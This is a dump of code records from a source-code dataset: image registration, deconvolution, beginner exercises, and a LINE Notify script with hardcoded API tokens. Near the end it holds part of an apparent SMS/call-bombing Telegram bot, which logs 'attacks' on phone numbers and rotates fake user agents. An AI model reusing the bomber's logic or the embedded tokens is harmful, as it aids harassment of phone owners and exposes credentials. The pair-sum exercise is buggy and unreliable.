from an advert\n # flow run where we asked someone a question but didn't receive a response.\n data = MessageFilters.filter_empty_messages(data,\n [plan.raw_field for plan in PipelineConfiguration.RQA_CODING_PLANS])\n\n log.info(\"Moving WS messages...\")\n data = WSCorrection.move_wrong_scheme_messages(user, data, prev_coded_dir_path)\n else:\n log.info(\"Not moving WS messages (because the 'MoveWSMessages' key in the pipeline configuration \"\n \"json was set to 'false')\")\n\n log.info(\"Auto Coding...\")\n data = AutoCode.auto_code(user, data, pipeline_configuration, icr_output_dir, coded_dir_path)\n\n log.info(\"Exporting production CSV...\")\n data = ProductionFile.generate(data, production_csv_output_path)\n\n if pipeline_run_mode == \"all-stages\":\n log.info(\"Running post labelling pipeline stages...\")\n\n log.info(\"Applying Manual Codes from Coda...\")\n data = ApplyManualCodes.apply_manual_codes(user, data, prev_coded_dir_path)\n\n log.info(\"Generating CSVs for Analysis...\")\n messages_data, individuals_data = AnalysisFile.generate(user, data, csv_by_message_output_path,\n csv_by_individual_output_path)\n\n log.info(\"Writing messages TracedData to file...\")\n IOUtils.ensure_dirs_exist_for_file(messages_json_output_path)\n with open(messages_json_output_path, \"w\") as f:\n TracedDataJsonIO.export_traced_data_iterable_to_jsonl(messages_data, f)\n\n log.info(\"Writing individuals TracedData to file...\")\n IOUtils.ensure_dirs_exist_for_file(individuals_json_output_path)\n with open(individuals_json_output_path, \"w\") as f:\n TracedDataJsonIO.export_traced_data_iterable_to_jsonl(individuals_data, f)\n else:\n assert pipeline_run_mode == \"auto-code-only\", \"pipeline run mode must be either auto-code-only or all-stages\"\n log.info(\"Writing Auto-Coding TracedData to file...\")\n IOUtils.ensure_dirs_exist_for_file(auto_coding_json_output_path)\n with open(auto_coding_json_output_path, \"w\") as f:\n TracedDataJsonIO.export_traced_data_iterable_to_jsonl(data, f)\n\n log.info(\"Python script complete\")\n","sub_path":"generate_outputs.py","file_name":"generate_outputs.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"559632981","text":"#Given an integer array , output all the unique pairs that sum up to a specific value k\ndef pair_sum(array, k):\n if len(array) < 2:\n return print(\"Too small\")\n\n seen = ()\n output = ()\n\n for num in array:\n target = num - k\n\n if target not in seen:\n seen.add(num)\n\n else:\n output.add((min(num, target), max(num, target)))\n \n print(\"\\n\".join(map(str, list(output))))\n\npair_sum([1, 2, 3, 2], 4)","sub_path":"array_pair_sum.py","file_name":"array_pair_sum.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"614952501","text":"# Autor: Aline Paulette Villegas Berdejo\n# Descripcion: Texto que describe en pocas palabras el problema que estás resolviendo.\n\n# Escribe tu programa después de esta línea.\nm=int(input(\"Mujeres inscritas: \"))\nh=int(input(\"Hombres inscritos: \"))\n\nta=m+h\npm=(m*100)/ta\nph=(h*100)/ta\n\nprint(\"Total de inscritos: \", ta)\nprint(\"Porcentaje de mujeres: %.1f\" % pm,\"%\")\nprint(\"Porcentaje de hombre: %.1f\" % ph, \"%\")\n","sub_path":"clase.py","file_name":"clase.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"356667266","text":"\"\"\"\r\nMedical Image Analysis (8DC00)\r\nProject Registration\r\nProject Group 20\r\nRebecca Küpper (1008070)\r\nMilan Pit (1025441)\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport registration as reg\r\nimport registration_util as util\r\nfrom IPython.display import display, clear_output\r\nfrom time import time\r\nimport sys\r\nimport os\r\n\r\n## new ##\r\nos.chdir('project')\r\n## --- ##\r\n\r\ndef chooseImage(filenumber, t1t2):\r\n \"\"\"\r\n Choose the right images according to the input\r\n \r\n The inputs are:\r\n filenumber - indicates number of the image, one of ['1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3']\r\n t1t2 - indicates if you want T1-to-T1 registration or T2-to-T1 registration\r\n \r\n The outputs are:\r\n path_I: the path to the fixed image\r\n path_Im: the path to the moving image\r\n \"\"\"\r\n \r\n filelist = ['1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3']\r\n \r\n #Assures that the input is right\r\n assert (filenumber in filelist), \"Invalid input, filenumber has to be in {}\".format(filelist) \r\n assert (t1t2=='t1' or t1t2=='t2'), \"Invalid input, t1t2 has to be 't1' or 't2'\"\r\n\r\n \r\n #Picks images depending on input\r\n path_I = '../data/image_data/{}_t1.tif'.format(filenumber)\r\n\r\n if t1t2 == 't1':\r\n path_Im = '../data/image_data/{}_t1_d.tif'.format(filenumber)\r\n else:\r\n path_Im = '../data/image_data/{}_t2.tif'.format(filenumber)\r\n \r\n return path_I, path_Im\r\n\r\ndef pointBasedRegistration(filenumber='3_3',t1t2='t1'):\r\n \"\"\"\r\n Perform point-based registration on two images\r\n This can be between T1-to-T1 registration or T2-to-T1 registration\r\n \r\n The inputs are:\r\n filenumber - indicates number of the image, one of ['1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3']\r\n t1t2 - indicates if you want T1-to-T1 registration or T2-to-T1 registration\r\n \r\n The outputs are:\r\n Im_t - transformed moving image T(Im)\r\n E_reg - registration error\r\n \"\"\"\r\n \r\n #Chooses images from given input\r\n path_I, path_Im = chooseImage(t1t2, filenumber)\r\n \r\n \r\n I = plt.imread(path_I)\r\n Im = plt.imread(path_Im)\r\n\r\n #Selects points for registration\r\n X, Xm = util.my_cpselect(path_I, path_Im)\r\n\r\n #Makes transformation matrix for registration depending on selected points and applies to the image\r\n T = reg.ls_affine(X,Xm)\r\n Im_t, Xt = reg.image_transform(Im, T)\r\n \r\n #Selects points for registration error\r\n X_ev, X_ev_m = util.my_cpselect(path_I, path_Im)\r\n \r\n #Transforms evaluation points of moved image by inverse transformation matrix\r\n T_inv = np.linalg.inv(T)\r\n X_ev_h = util.c2h(np.array(X_ev_m)) \r\n \r\n #Computes registration error using average distance using Pythagoras\r\n n = len(X_ev[1])\r\n dist = 0\r\n \r\n X_ev_t = T_inv.dot(X_ev_h)\r\n for idx in range(0, n-1):\r\n dist = dist + np.sqrt((X_ev[0][idx] - X_ev_t[0][idx])**2 + (X_ev[1][idx] - X_ev_t[1][idx])**2)\r\n \r\n E_reg = dist / n\r\n \r\n print(E_reg)\r\n \r\n return Im_t, E_reg\r\n\r\ndef intensityBasedRegistration(affine=True, corr=True, iterations=250, mu=1e-3, t1t2='t1', filenumber='1_1'):\r\n \"\"\"\r\n This function is an application of intensity based image registration.\r\n It uses three available methods of intensity based registration:\r\n rigid correlation, affine correlation and affine mutual information.\r\n These functions calculate similarity between the two input images, which is used to register the 
images.\r\n\r\n The inputs are:\r\n affine (default=True): A boolean that determines whether the affine or rigid method is used.\r\n True means the affine method is used, False means the rigid method is used.\r\n corr (default=True): A boolean that determines whether the similarity is calculated using correlation or mutual information.\r\n True means that correlation is used, False means that mutual information is used. If affine=False, correlation will automatically be used.\r\n iterations (default=250): An integer that determines the amount of times the gradient ascent is updated.\r\n mu (default=1e-3): A float that determines the learning rate of the gradient ascent.\r\n\r\n The output is:\r\n A single image containing:\r\n The final registration; The parameters of the registration; The similarity curve of the two images.\r\n\r\n An example of a correct function call:\r\n intensityBasedRegistration(True, True, 50, 1e-2)\r\n \"\"\"\r\n\r\n #Sanitizes input\r\n iterations = int(iterations)\r\n \r\n # Choose images from given input\r\n path_I, path_Im = chooseImage(t1t2, filenumber)\r\n \r\n \r\n I = plt.imread(path_I)\r\n Im = plt.imread(path_Im)\r\n\r\n #Sets initial parameters and function based on input\r\n if(affine):\r\n x = np.array([0., 1., 1., 0., 0., 0., 0.])\r\n if(corr):\r\n fun = lambda x: reg.affine_corr(I, Im, x)\r\n else:\r\n fun = lambda x: reg.affine_mi(I, Im, x)\r\n else:\r\n x = np.array([0., 0., 0.])\r\n fun = lambda x: reg.rigid_corr(I, Im, x)\r\n\r\n similarity = np.full((iterations, 1), np.nan)\r\n\r\n fig = plt.figure(figsize=(20,10))\r\n\r\n # fixed and moving image, and parameters\r\n ax1 = fig.add_subplot(121)\r\n\r\n # fixed image\r\n im1 = ax1.imshow(I)\r\n \r\n # moving image\r\n im2 = ax1.imshow(I, alpha=0.7)\r\n \r\n #Shows parameters in image\r\n txt = ax1.text(0.3, 0.95,\r\n np.array2string(x, precision=5, floatmode='fixed'),\r\n bbox={'facecolor': 'white', 'alpha': 1, 'pad': 10},\r\n transform=ax1.transAxes)\r\n\r\n #Sets up similarity curve\r\n ax2 = fig.add_subplot(122, xlim=(0, iterations), ylim=(0, 1))\r\n\r\n learning_curve, = ax2.plot(range(1,iterations+1), similarity, lw=2)\r\n ax2.set_xlabel('Iteration')\r\n ax2.set_ylabel('Similarity (%s)' %(\"Correlation\"*(corr) + \"Mutual Information\"*(1-corr)))\r\n ax2.grid()\r\n\r\n # #Logging steps are calculated. 
Cannot be done easier,\r\n # #as it is not guaranteed that the amount of iterations is evenly divisible by 4\r\n # step1 = int(iterations/4-1)\r\n # step2 = int(iterations/2-1)\r\n # step3 = int(iterations*3/4-1)\r\n\r\n #Stores start time of gradient ascent\r\n start_time = time()\r\n \r\n #Applies gradient ascent [iterations] times\r\n for k in np.arange(iterations):\r\n \r\n #Gradient is calculated and applied to the parameters\r\n g = reg.ngradient(fun, x)\r\n x += g*mu\r\n\r\n #Calls similarity function to calculate the similarity and transformed image\r\n S, Im_t, _ = fun(x)\r\n\r\n # #Logs time elapsed and estimated total time of the gradient ascent\r\n print(\"Iteration {:d}/{:d}, {:.2f}% done\".format(k+1, iterations, (k+1)/iterations * 100))\r\n # \r\n # if(k == 0 or k == step1 or k == step2 or k == step3):\r\n # print(\"Elapsed time: {:.1f} s\\nEstimated time: {:.1f} s\".format(\r\n # time()-start_time, (time()-start_time) * (iterations/(k+1))))\r\n # \r\n # elif(k+1==iterations):\r\n # print(\"Duration: {:.2f} s\".format(time()-start_time))\r\n \r\n #Updates moving image and parameters\r\n im2.set_data(Im_t)\r\n txt.set_text(np.array2string(x, precision=5, floatmode='fixed'))\r\n\r\n #Updates similarity curve\r\n similarity[k] = S\r\n learning_curve.set_ydata(similarity)\r\n\r\n #Logs end result of similarity\r\n print(\"Final similarity: %f\" %(S))\r\n\r\n #Shows final image and plot (required for non-jupyter python)\r\n # plt.show() \r\n filename = \"../plaatjes/{}__{}__9e5__250it.png\".format(t1t2, filenumber) \r\n plt.savefig(filename)\r\n return S\r\n\r\nif(__name__ == \"__main__\"): \r\n\r\n # Uncomment either point based registration or intensity based registration.\r\n \r\n images = ('1_1', '1_2', '1_3', '2_1', '2_2', '2_3', '3_1', '3_2', '3_3')\r\n t1t2 = 't2' \r\n \r\n ######################################################\r\n \r\n # Point based registration\r\n \r\n # pointBasedRegistration(images[0], t1t2)\r\n \r\n ######################################################\r\n \r\n # Intensity based registration\r\n \r\n aff = True\r\n corr = True\r\n it = 250\r\n mu = 9e-5\r\n \r\n S = []\r\n for i, image in enumerate(images):\r\n print(\"Processing image {} of {}.\".format(i+1, len(images)))\r\n S.append(intensityBasedRegistration(aff, corr, it, mu, t1t2, image))\r\n \r\n \r\n # Print results\r\n for j in range(len(S)):\r\n print(images[j]+': '+str(S[j]))\r\n \r\n #######################################################\r\n \r\n \r\n \r\n","sub_path":"project/registration_project.py","file_name":"registration_project.py","file_ext":"py","file_size_in_byte":8632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
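The point-based routine in the record above scores registration quality as the average Euclidean distance between corresponding point sets. A self-contained sketch of that error measure, assuming the 2xN points-as-columns layout the record uses (names and test values are illustrative):

import numpy as np

def mean_point_distance(X, Y):
    """Mean Euclidean distance between corresponding 2xN point sets."""
    X = np.asarray(X, dtype=float)
    Y = np.asarray(Y, dtype=float)
    # per-point Euclidean distance (Pythagoras over the rows), then the mean
    return np.sqrt(((X - Y) ** 2).sum(axis=0)).mean()

fixed = np.array([[0.0, 3.0], [0.0, 4.0]])      # points are columns: (0,0) and (3,4)
moved = np.zeros((2, 2))
assert mean_point_distance(fixed, moved) == 2.5  # (0 + 5) / 2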
+{"seq_id":"227667614","text":"def is_palindrome_num(num):\n if num == 0:\n return True\n elif num < 0:\n i = num * (-1)\n else:\n i = num\n num_list = []\n while i / 10 != 0:\n num_list.append(i % 10)\n i = i // 10\n is_palindrome = True\n l_idx = 0\n r_idx = len(num_list) - 1\n while r_idx > l_idx:\n if num_list[l_idx] != num_list[r_idx]:\n is_palindrome = False\n break\n r_idx -= 1\n l_idx += 1\n return is_palindrome\n\n\nprint(is_palindrome_num(0))\nmax_palindrome = -1\ns_cycle = False\nfor i in range(100, 1000):\n for j in range(100, 1000):\n mult = i * j\n is_pal = is_palindrome_num(mult)\n if is_pal and mult > max_palindrome:\n max_palindrome = mult\n\nprint(max_palindrome)","sub_path":"DedMokar/Palindrome.py","file_name":"Palindrome.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"506270088","text":"#!/usr/bin/env python\n__author__ = \"Mike Gavrilov\"\n__copyright__ = \"Copyright 2013\"\n__license__ = \"\"\n__version__ = \"0.5\"\n__email__ = \"gavrikster _ at _ gmail.com\"\n__status__ = \"Beta\"\n\n\nimport sys\nfrom PySide.QtGui import *\nfrom mainWindow import MainWindow\n\napp = QApplication(sys.argv)\n\nMAIN_WINDOW = MainWindow()\nMAIN_WINDOW.show()\nMAIN_WINDOW.on_tool_cm_press()\n\napp.exec_()\n\n","sub_path":"sqldumpGUI.py","file_name":"sqldumpGUI.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"78000192","text":"import math\n#diameter of jar = 10cm\n#height of jar = 16cm\n#circumference = 2πr\n#area of circle = πr²\n\npi = math.pi\njar_diameter = 10\njar_radius = 5\njar_height = 16\njar_base_area = pi*(jar_radius ** 2)\njar_volume_cm = jar_base_area * jar_height\nprint(jar_volume_cm)\n\ncookie_diameter = 6\ncookie_radius = 3\ncookie_height = 2\ncookie_base_area = pi*(cookie_radius ** 2)\ncookie_volume_cm = cookie_base_area * cookie_height\nprint(cookie_volume_cm)\n\nincrement = int(0)\n\ncookiefit = True\n\nwhile cookiefit == True:\n print(increment)\n if cookie_volume_cm > jar_volume_cm:\n cookiefit = False\n else:\n jar_volume_cm = jar_volume_cm - cookie_volume_cm\n increment = increment + 1\n\nprint(\"finished\")\n#MATHS\n#\n#math.pi\n#math.sqrt(2)\n#math.sqrt(-1)\n#math.sin(0)\n#math.sin(math.pi / 2)\n#math.log(1)\n#math.log(math.e)\n#\n#\n#\n#\n#\n#\n\n\n","sub_path":"jar.py","file_name":"jar.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"55480363","text":"#pip\r\n# pip\r\nimport requests\r\n\r\n\r\n\r\ndef lineNotifyMessage(token='lkGIyFAxVcJcW9qswWggKzarqaTGQJu9QkqjksmcdKD', msg='Notify from LINE, HELLO WORLD'):\r\n headers = {\r\n \"Authorization\": \"Bearer \" + token,\r\n \"Content-Type\": \"application/x-www-form-urlencoded\"\r\n }\r\n\r\n payload = {'message': msg}\r\n r = requests.post(\"https://notify-api.line.me/api/notify\", headers=headers, params=payload)\r\n return r.status_code\r\n\r\n\r\n\r\n\r\ndef main():\r\n\r\n lineNotifyMessage(token='zqTJF3vTvJbTHwkmKs9J74PPdX8iuNwwM9ix8SGKGqG')\r\n\r\nif __name__ == '__main__':\r\n\r\n main()\r\n print('Complete!!!!!!!!!!')","sub_path":"line/line_notify_message.py","file_name":"line_notify_message.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"174964623","text":"import os\nimport cv2\nimport copy\nimport numpy as np\nimport tensorflow as tf\nfrom os import listdir\nfrom pathlib import Path\nfrom os.path import isfile, join\nfrom tqdm import tqdm\nfrom sklearn.datasets import load_sample_image\nfrom sklearn.feature_extraction import image\n\nimport matplotlib.pyplot as plt\n\ndef create(pp, img, p):\n\n img_ = np.zeros((p, 128, 128, 1), dtype=np.float32)\n\n for i in range(len(img)):\n mask = np.random.choice([0, 1], size=(128, 128), p=[1-pp, pp])\n idx_w, idx_h = np.where(mask == 1)\n \n for j in range(len(idx_w)):\n img[i, idx_w[j],idx_h[j],0] = 0\n \n img_[i,:,:,0] = img[i,:,:,0]\n return img_\n\ndef curate(path, lt, x, y):\n \n cnt = 0\n for idx, j in tqdm(enumerate(lt)):\n onlyfiles = [f for f in listdir(lt[idx]) if isfile(join(lt[idx], f))]\n onlyfiles.remove('Thumbs.db')\n\n for _, i in enumerate(onlyfiles):\n p = join(str(lt[idx]),i)\n img = cv2.imread(p, 0)\n y_patches = image.extract_patches_2d(img, (128,128), max_patches = 8)\n \n y_patches = np.reshape(y_patches,(8, 128,128,-1))\n\n \n y_patch = copy.deepcopy(y_patches)\n x_patches = create(0.85, y_patch, 8)\n \n for k in range(len(x_patches)):\n x[cnt] = x_patches[k]\n y[cnt] = y_patches[k]\n cnt += 1\n\ndef curate_(path, lt, x, y):\n\n cnt = 0\n for idx, j in tqdm(enumerate(lt)):\n onlyfiles = [f for f in listdir(lt[idx]) if isfile(join(lt[idx], f))]\n\n for _, i in enumerate(onlyfiles):\n p = join(str(lt[idx]),i)\n img = cv2.imread(p, 0)\n y_patches = image.extract_patches_2d(img, (128,128), max_patches = 2)\n\n y_patches = np.reshape(y_patches,(2, 128,128,-1))\n\n\n y_patch = copy.deepcopy(y_patches)\n x_patches = create(0.85, y_patch, 2)\n\n for k in range(len(x_patches)):\n x[cnt] = x_patches[k]\n y[cnt] = y_patches[k]\n cnt += 1\n\ndef imgSave():\n \n x_ = np.zeros((10, 128, 128, 1), dtype=np.uint8)\n y_ = np.zeros((10, 128, 128, 1), dtype=np.uint8)\n\n data = Path('/workspace/storage/cnn-cs/data/test')\n lst = os.listdir(data)\n lst.sort()\n\n count = 0\n\n for _, i in enumerate(lst):\n p = join(data,i)\n img = cv2.imread(p, 0)\n\n y_patches = image.extract_patches_2d(img, (128, 128), max_patches = 1)\n y_patches = np.reshape(y_patches,(1, 128, 128,-1))\n y_patch = copy.deepcopy(y_patches)\n x_patches = create(0.10, y_patch, 1)\n\n for k in range(len(x_patches)):\n x_[count] = x_patches[k]\n y_[count] = y_patches[k]\n count += 1\n\n x_ = x_ / 255.\n y_ = y_ / 255.\n\n fig = plt.figure(figsize=(25, 25))\n columns = 10\n rows = 1\n for i in range(1, columns*rows + 1):\n img_x = x_[i-1]\n ax = fig.add_subplot(rows, columns, i)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.imshow(np.reshape(img_x,(128,128)),cmap='gray')\n\n plt.savefig('/workspace/data/image_sparse.png')\n \n model = tf.keras.models.load_model('/workspace/data/cs-simple-model-1000.h5', compile =False)\n \n predict = model.predict(x_[:10,:,:,:])\n \n fig = plt.figure(figsize=(25, 25))\n columns = 10\n rows = 1\n for i in range(1, columns*rows + 1):\n img_x = predict[i-1]\n ax = fig.add_subplot(rows, columns, i)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.imshow(np.reshape(img_x,(128,128)), cmap='gray')\n\n plt.savefig('/workspace/data/image_recons.png')\n psnr_ = tf.image.psnr(y_[:10,:,:,:], predict, max_val=1.0)\n print(psnr_)\n\ndef printResult(X, Y):\n\n fig = plt.figure(figsize=(9, 4))\n columns = 10\n rows = 1\n for i in range(1, columns*rows + 1):\n img_x = X[i-1]\n ax = fig.add_subplot(rows, columns, i)\n ax.set_xticks([])\n ax.set_yticks([])\n plt.imshow(img_x, cmap = 
'gray')\n plt.show()\n return None \n\ndef saveResult(onlyfewfiles):\n rows = 3\n cols = 3\n\n fig = plt.figure(figsize=(12,10))\n\n for i in range(1,rows+1):\n for j in range(1, cols+1):\n img = cv2.imread(os.path.join(os.getcwd(),onlyfewfiles[((i-1)*rows)+j - 1]), 0)\n patch = image.extract_patches_2d(img, (128,128), max_patches = 1)\n img = np.resize(patch,(128,128))\n ax = fig.add_subplot(rows, cols, ((i-1)*rows)+j)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_title('{}\\nNewline'.format(onlyfewfiles[((i-1)*rows)+j - 1]), fontsize=8)\n plt.imshow(img, cmap='gray')\n\n plt.show()\n\n return None\n\ndef convertModel(path):\n \n lst = [x for x in os.listdir(path) if os.path.isdir(os.path.join(path,x))]\n\n for idx, val in enumerate(lst):\n converter = tf.lite.TFLiteConverter.from_saved_model(path+'/'+val)\n tflite_model = converter.convert()\n with open('/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/'+val+'-model.tflite', 'wb') as f:\n f.write(tflite_model)\n return None\n\ndef extractWeights(path):\n \n model = tf.keras.models.load_model(path, compile=False)\n\n for layer in model.layers:\n if len(layer.weights) > 0:\n print(layer.name, layer.weights[0].shape)\n print(np.where(layer.weights[0] == 0))\n\n return None\n\nif __name__ == \"__main__\":\n\n '''\n count_n = 0\n IMG_WIDTH = 128\n IMG_HEIGHT = 128\n\n Path1 = Path('/workspace/storage/cnn-cs/data/images')\n Path2 = Path('/workspace/storage/cnn-cs/data/train')\n\n lst = [x for x in Path1.iterdir() if Path1.is_dir()]\n lst_ = [x for x in Path2.iterdir() if Path2.is_dir()] \n\n for i in range(len(lst)):\n count_n += len(os.listdir(os.path.join(Path1,lst[i]))) - 1\n \n x_train = np.zeros((count_n * 8, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n y_train = np.zeros((count_n * 8, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n\n curate(Path1, lst, x_train, y_train)\n\n count_n = 0\n\n for i in range(len(lst_)):\n count_n += len(os.listdir(os.path.join(Path2,lst_[i]))) \n\n X_train = np.zeros((count_n * 2, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n Y_train = np.zeros((count_n * 2, IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.uint8)\n\n curate_(Path2, lst_, X_train, Y_train)\n \n\n convertModel()\n '''\n\n\n #p_hi = '/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/hi-model/cs-hi-model-500.h5'\n p_simple = '/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/simple-model/cs-simple-model-500.h5'\n p_sq = '/home/wilfred/Downloads/github/Python_Projects/cnn-cs/results/constant_85/sq-model/cs-sq-model-500.h5'\n extractWeights(p_sq)\n","sub_path":"utils/utilities_new.py","file_name":"utilities_new.py","file_ext":"py","file_size_in_byte":6833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
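The create() helper in the record above zeroes randomly chosen pixels one index pair at a time. A vectorized sketch of the same Bernoulli masking, assuming as the record does that pp is the fraction of pixels to drop (the function name and seed are illustrative):

import numpy as np

def drop_pixels(batch, pp, seed=None):
    """Zero a random fraction `pp` of the pixels in an (N, H, W, C) batch."""
    rng = np.random.default_rng(seed)
    # keep-mask drawn per pixel: 0 with probability pp, 1 otherwise
    keep = rng.choice([0.0, 1.0], size=batch.shape[:3] + (1,), p=[pp, 1.0 - pp])
    return batch * keep

batch = np.ones((8, 128, 128, 1), dtype=np.float32)
sparse = drop_pixels(batch, 0.85, seed=0)
print(round(1.0 - sparse.mean(), 2))   # close to 0.85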
+{"seq_id":"298539245","text":"from multiprocessing import Value\nimport numpy as np\nfrom pfb.opt import power_method, pcg, primal_dual\nfrom pfb.operators import PSF, DaskPSI\n\ndef grad_func(x, dirty, psfo):\n return psfo.convolve(x) - dirty\n\ndef sara(psf, model, residual, sig_21=1e-6, sigma_frac=0.5, \n mask=None, beam=None, dual=None, weights21=None, \n nthreads=1, maxit=10, gamma=0.99, tol=1e-3, # options for outer optimisation\n psi_levels=3, psi_basis=None, # sara dict options\n reweight_iters=None, reweight_alpha_ff=0.5, reweight_alpha_percent=10, # reweighting options\n pdtol=1e-6, pdmaxit=250, pdverbose=1, positivity=True, tidy=True, # primal dual options\n cgtol=1e-6, cgminit=25, cgmaxit=150, cgverbose=1, # conjugate gradient options\n pmtol=1e-5, pmmaxit=50, pmverbose=1): # power method options\n \n if len(residual.shape) > 3:\n raise ValueError(\"Residual must have shape (nband, nx, ny)\")\n \n nband, nx, ny = residual.shape\n\n if beam is None:\n beam = lambda x: x\n else:\n try:\n assert beam.shape == (nband, nx, ny)\n beam = lambda x: beam * x\n except:\n raise ValueError(\"Beam has incorrect shape\")\n\n if mask is None:\n mask = lambda x: x\n else:\n try:\n if mask.ndim == 2:\n assert mask.shape == (nx, ny)\n mask = lambda x: mask[None] * x\n elif mask.ndim == 3:\n assert mask.shape == (1, nx, ny)\n mask = lambda x: mask * x\n else:\n raise ValueError\n except:\n raise ValueError(\"Mask has incorrect shape\")\n\n # PSF operator\n psfo = PSF(psf, nthreads=nthreads, imsize=residual.shape, mask=mask, beam=beam)\n residual = beam(mask(residual))\n if model.any():\n dirty = residual + psfo.convolve(model)\n else:\n dirty = residual\n\n # wavelet dictionary\n if psi_basis is None:\n psi = DaskPSI(imsize=residual.shape, nlevels=psi_levels, nthreads=nthreads)\n else:\n if not isinstance(psi_basis, list):\n psi_basis = [psi_basis]\n psi = DaskPSI(imsize=residual.shape, nlevels=psi_levels, nthreads=nthreads, bases=psi_basis)\n \n # l21 weights and dual \n if weights21 is None:\n print(\" Initialising all l21 weights to unity.\")\n weights21 = np.ones((psi.nbasis, psi.nmax), dtype=residual.dtype)\n if dual is None:\n dual = np.zeros((psi.nbasis, nband, psi.nmax), dtype=residual.dtype)\n\n # l21 reweighting\n if reweight_iters is not None:\n reweight_iters = list(reweight_iters)\n else:\n reweight_iters = []\n \n # residual\n residual_mfs = np.sum(residual, axis=0)\n rms = np.std(residual_mfs)\n rmax = np.abs(residual_mfs).max()\n \n # preconditioning operator\n def hess(x): \n return psfo.convolve(x) + x / (sigma_frac*rmax) \n\n if tidy:\n # spectral norm\n posthess = hess\n beta, betavec = power_method(hess, residual.shape, tol=pmtol, maxit=pmmaxit, verbosity=pmverbose)\n else:\n posthess = lambda x: x\n beta = 1.0\n betavec = 1.0\n\n # deconvolve\n for i in range(0, maxit):\n M = lambda x: x * (sigma_frac*rmax) # preconditioner\n x = pcg(hess, residual, np.zeros(residual.shape, dtype=residual.dtype), M=M, tol=cgtol,\n maxit=cgmaxit, minit=cgminit, verbosity=cgverbose)\n \n # update model\n modelp = model\n model = modelp + gamma * x\n model, dual = primal_dual(posthess, model, modelp, dual, sig_21, psi, weights21, beta,\n tol=pdtol, maxit=pdmaxit, report_freq=25, mask=mask, verbosity=pdverbose,\n positivity=positivity)\n\n # reweighting\n if i in reweight_iters:\n l2_norm = np.linalg.norm(dual, axis=1)\n for m in range(psi.nbasis):\n indnz = l2_norm[m].nonzero()\n alpha = np.percentile(l2_norm[m, indnz].flatten(), reweight_alpha_percent)\n alpha = np.maximum(alpha, 1e-8) # 
hardcode minimum\n weights21[m] = alpha/(l2_norm[m] + alpha)\n reweight_alpha_percent *= reweight_alpha_ff\n\n # get residual\n residual = -grad_func(model, dirty, psfo)\n \n # check stopping criteria\n residual_mfs = np.sum(residual, axis=0)\n rmax = np.abs(residual_mfs).max()\n rms = np.std(residual_mfs)\n eps = np.linalg.norm(model - modelp)/np.linalg.norm(model)\n\n print(\" SARA - At iteration %i peak of residual is %f, rms is %f, current eps is %f\" % (i+1, rmax, rms, eps))\n\n if eps < tol:\n print(\" SARA - Success, convergence after %i iterations\" %(i+1))\n break\n\n if tidy and i{meta[\"from_user\"]}\\n'\r\n f'Number: {meta[\"formatted\"]}\\n'\r\n f'Cycles: {meta[\"cycles\"]}\\n'\r\n f'Attack UID: {meta[\"attack_id\"]}\\n'\r\n f'Operator: {meta[\"operator\"]}\\n'\r\n f'Country: {meta[\"country\"]}\\n'\r\n f'Region: {meta[\"region\"]}')\r\n\r\n kb = types.InlineKeyboardMarkup()\r\n button1 = types.InlineKeyboardButton(\r\n \"Забанить\",\r\n callback_data=f\"ban_user {meta['from_user']}\"\r\n )\r\n button2 = types.InlineKeyboardButton(\r\n 'Профиль',\r\n callback_data=f\"get_profile {meta['from_user']}\"\r\n )\r\n button3 = types.InlineKeyboardButton(\r\n 'Остановить',\r\n callback_data=f\"stop_attack {meta['from_user']}\"\r\n )\r\n button4 = types.InlineKeyboardButton(\r\n 'Ссылка',\r\n url=f'tg://resolve?domain={database.get_user(meta[\"from_user\"])[\"user_name\"]}'\r\n )\r\n button5 = types.InlineKeyboardButton(\r\n 'Логи',\r\n callback_data=f\"send_logs {meta['attack_id']}\"\r\n )\r\n\r\n kb.row(button1, button2)\r\n\r\n if database.get_user(meta[\"from_user\"])[\"user_name\"] is not None:\r\n kb.row(button3, button4)\r\n kb.row(button5)\r\n\r\n else:\r\n kb.row(button3, button5)\r\n text += f'\\n\\nMention of a user'\r\n\r\n await bot.send_message(config.attacks_logs, text, reply_markup=kb, parse_mode='html')\r\n\r\n\r\ndef get_user_agent():\r\n software_names = [SoftwareName.CHROME.value, SoftwareName.LYNX.value,\r\n SoftwareName.BLUE_CHROME.value, SoftwareName.EDGE.value,\r\n SoftwareName.INTERNET_EXPLORER.value, SoftwareName.FIREFOX.value,\r\n SoftwareName.SAFARI.value, SoftwareName.YANDEX.value,\r\n SoftwareName.CHROMIUM.value]\r\n operating_systems = [OperatingSystem.WINDOWS.value, OperatingSystem.LINUX.value,\r\n OperatingSystem.ANDROID.value, 